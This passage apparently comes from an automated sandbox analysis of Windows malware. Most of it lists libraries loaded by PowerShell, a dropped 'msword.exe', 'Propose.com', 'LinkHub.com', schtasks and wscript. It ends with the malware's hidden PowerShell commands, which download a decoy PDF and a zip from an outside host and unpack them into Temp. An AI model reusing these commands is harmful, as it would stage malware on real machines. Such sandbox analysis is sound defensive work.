Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wldp.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
